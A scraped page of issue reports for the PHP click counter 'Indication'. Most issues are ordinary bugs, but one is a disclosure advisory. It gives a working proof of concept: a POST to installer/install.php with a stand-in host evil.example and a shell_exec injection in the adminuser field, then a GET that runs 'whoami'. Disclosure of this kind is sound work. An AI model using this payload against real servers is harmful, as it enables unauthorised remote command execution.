joshf / indication Goto Github PK
View Code? Open in Web Editor NEWIndication is a PHP click counter which can also be used as a download counter
License: MIT License
indication's People
Contributors
Stargazers
Watchers
indication's Issues
New theme
Write a new theme for SHTracker
4.2.1 not counting
Hi Josh,
A clean install of Indicator-newest.zip.
Installation: OK
Login: OK
Add link: OK
Count links: not OK
The created link is working, i.e. when clicking on teh downlaod,
the 'save as' vindow opens, select 'save ', downlaod is savedd.
However, the numer (prestet to a value of the previous used download couner) stays the same number.
non alphanumeric characters not accepted in url
If creating a new download link, it has characters such as "~" or "-" in the URL, it doesn't accept it as a valid input.
Almost there
Hi Josh,
Yes, the bug is repeatable. I also tried to add a link, which also produced an error in the link id.
That one is just one time tested.
Ok, downloaded the mentioned branch, emptied the database and did a clean install.
Ah! Now the 'Path to script' is correctly entered by the installer.
Click: Install
Installer
Install Complete
Now login:OK
Go to 'Settings': NOT OK
At:
Count Unique Visitors Only
This settings allows you to make sure an individual user's clicks are only counted once
In the field Word after field
"Enabled" Enabled
"Disabled" Disabled";
} else { echo "
"Enabled" Enabled
"Disabled" Disabled"
; } ?>
Time
and
Theme
are OK
Could it be that in version 4 of PHP you used certain words that are reserved words in MySQL 5?
Hope this helps,
Thanks for the quick fix.
We'll get there!
Dirk
Wrong date for 4.3
According to your readme.md, you released 4.3 before 4.2 and 4.2.1, so, I suppose it's ment to be 5/6 instead of 5/5?
Multiple vulnerabilities in `installer/install.php` script allow remote command execution
Overview
The installer/install.php script contains multiple vulnerabilities that can be exploited by a remote, unauthorized user to gain remote command execution on the server.
Description
The containing vulnerabilities are:
The following proof of concept writes a shell into the config.php:
POST /Indication/installer/install.php HTTP/1.0
doinstall&dbhost=evil.example&dbuser=dummy&dbpassword=dummy&dbname=dummy&adminuser=");echo+shell_exec($_REQUEST[0]."&adminpassword=1
This triggers the installer/install.php script to initialize the Indication table on the MySQL server evil.example while writing the provided parameters into the config.php file on the victim server, overwriting it if it already exists.
Due to an improper encoding of the user provided values during the generation of the PHP code for the config.php, it is possible to inject PHP code into the config.php file (see adminuser parameter) which consequently allows the execution of arbitrary commands by the remote attacker:
GET /Indication/config.php?0=whoami HTTP/1.0
Mitigation
- Improper Authorization: Abort the installation if
config.phpalready exists. - Improper Control of Generation of Code: Use
var_exportwhen exporting values to PHP code.
Bug in 4.2.1?
Hello Josh,
I found your program a couple of days ago as a test on
an old server with PHP 4.3.10 with Mysql 4.0.23a.
Problemless installation, great program!, easy to use.
Then I did a clean instal (no database migration!) on
a server with PHP 5.2.9-2 and Mysql 5.1.58
Bug report:
Entered all the fields correctly, but
Installation:
Path to script: this field showed:
I replaced it with http://wyxs.net/links/
and click [Install]
Result: new screen:
Installer: install complete.
Go to login: ckick: OK
So far everything went well, then:
Click: Settings
Settings opens:
Admin details
Admin user:
Password:
At all other entry fields is visible:
Hope you can fix this.
Kind regards,
Dirk
Our Open Source projects for schools:
- Website@School (Content Management & Learning System):
Main site: http://websiteatschool.eu
Manual (latest versions): http://wyxs.net/web/was/ - Digital interactive whiteboard for ? 99,95:
DIY: http://wyxs.net/web/wiiscan/
DINotY: http://onsbord.nl - ServerAtSchool (Server-client system):
http://serveratschool.net
ServerAtSchool Dutch site:
http://serveropschool.nl - Association "Schools Together Rich with ICT" (STRICT)
http://strict.nu
URL is always converted to lowercase
If a new URL has upper case chars it automatically converts them to the lower case equivalent, leaving an incorrect URL.
Example:
Store settings in a database table
Store all but database settings in a database table.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.